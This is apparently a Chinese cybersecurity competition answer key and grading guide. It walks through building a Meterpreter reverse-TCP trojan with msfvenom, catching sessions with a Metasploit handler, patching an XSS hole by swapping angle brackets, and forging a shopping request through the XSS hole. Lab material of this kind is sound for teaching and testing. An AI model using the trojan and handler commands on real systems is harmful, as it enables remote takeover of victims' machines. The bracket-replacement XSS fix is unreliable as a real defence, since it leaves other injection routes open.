文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.
正向查找区域:主机(截图) Zone:Org 主机:hacker
Metasploit Framework:TrojanHorse.exe生成 (3分) root@bt:~#Ifconfig (截图)
显示Kali IP地址:
截图包含:
root@bt:~#msfvenom –p windows/meterpreter/reverse_tcp LHOST= LPORT=80 –f exe –o trojanhorse.exe
5. 当\ Employee Message Board\页面的访问者执行网站()中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程控制,打开访问者主机的CMD.exe命令行窗口,并将该操作过程截图;(5分)
11
文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.
Metasploit Framework:Hacker Reverse Tcp连接客户端 (2分)
root@bt:~#msfconsole
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST LHOST =>
msf exploit(handler) > set LPORT 80 LPORT => 80
msf exploit(handler) > exploit [*] Started reverse handler on [*] Starting the payload handler... (截图中包含黄色部分)
访问者主机需要被Kali主机远程控制(3分) Kali MSF提示(截图)包含如下信息 Kali IP: 访问者主机IP:
[*] Sending stage (…… bytes) to
[*] Meterpreter session 1 opened ( -> at …… meterpreter >
12
文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.
Kali截图包含打开访问者主机的CMD.exe命令行窗口;
6. 进入DCST中的WebServ2003服务器的C:\\AppServ\\www目录,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS渗透测试,并将修改后的PHP源程序截图;(10分) (10分)
在服务器场景原insert.php程序语句$info=$_REQUEST[‘message’]后加入:
绿色部分,通过替换函数,通过其它字符({},(),[]等字符)替换字符“<”和“>”均可得分; $info=str_replace(“<”,”(”,$info); $info=str_replace(“>”,”)”,$info); 或
$info=str_replace(“<”,”{”,$info); $info=str_replace(“>”,” }”,$info); 或
$info=str_replace(“<”,”[”,$info);
13
文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.
$info=str_replace(“>”,” ]”,$info);
7. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效,并将验证过程截图;(5分)
SQL Server企业管理器中,Message表中info字段注入语句符号“<”和“>”被替换为上一题替换后的字符;同时Communication Message页面显示Content:注入语句符号“<”和“>”被替换为上一题替换后的字符; (5分)
8. Web访问DCST中的WebServ2003服务器,\ Shopping Hall\,分析该页面源程序,找到提交的变量名,并截图;(5分)
找到源程序:(2分)
14
文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.
页面标题为:
Shopping Hall
找到提交的变量名:(3分) goods=keyboard&quantity=1 goods=mouse&quantity=1 goods=monitor&quantity=1 goods=cpu&quantity=1 goods=memory&quantity=1 goods=dvdrom&quantity=19. 对该任务题目1页面注入点进行渗透测试,使\ Employee Message Board\页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看\页面,并将注入代码及测试过程截图;(5分) 构造注入代码:(2分)